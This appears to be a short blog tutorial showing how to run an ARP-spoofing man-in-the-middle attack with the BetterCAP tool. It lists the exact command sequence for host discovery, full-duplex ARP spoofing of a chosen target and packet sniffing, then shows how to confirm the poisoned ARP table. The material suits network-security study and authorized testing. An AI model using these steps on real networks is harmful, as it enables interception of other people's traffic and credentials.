Man-in-the-Middle Attacks Made Easy with BetterCAP

A Man-in-the-Middle (MITM) attack is a type of cyber attack where an attacker secretly intercepts communication between two parties who believe they are directly communicating with each other. In other words, the attacker stands in the middle of the communication channel between two users or devices, without them knowing.

Installing bettercap:

<apt-get install bettercap>

I have already installed it.

To run it, type bettercap and then type help.

Performing MITM: To perform MITM we will use the following modules:

1. net.probe: sends different types of probe packets to the IPs in the subnet so that the net.recon module can detect them.
2. net.recon: periodically reads the ARP table to detect new hosts on the network.
3. arp.spoof: spoofs the selected hosts to perform MITM.
4. net.sniff: a network packet sniffer and fuzzer.

You can type help followed by the module name to get some details about it.

Let's start our MITM:

1. Start the probe module to send probe packets to devices on the network. (Note: the net.probe module can automatically turn on the net.recon module.)

<net.probe on>

2. Start host discovery

<net.recon on>

3. Set the arp.spoof module option fullduplex to true

<set arp.spoof.fullduplex true>

4. Specify the target to spoof

[set arp.spoof.targets <ip>]

5. Start ARP spoofer:

<arp.spoof on>

6. Start the packet sniffer:

<net.sniff on>

7. Type help to see the modules running

Now look at the ARP table on any machine connected to that network; in my case I checked on my Windows machine using the command <arp -a>. Notice that the ARP entries for the attacker machine and the router show the same MAC address: the Windows machine ‘thinks’ the router's MAC address is the same as the Kali machine's, because its ARP table is spoofed.
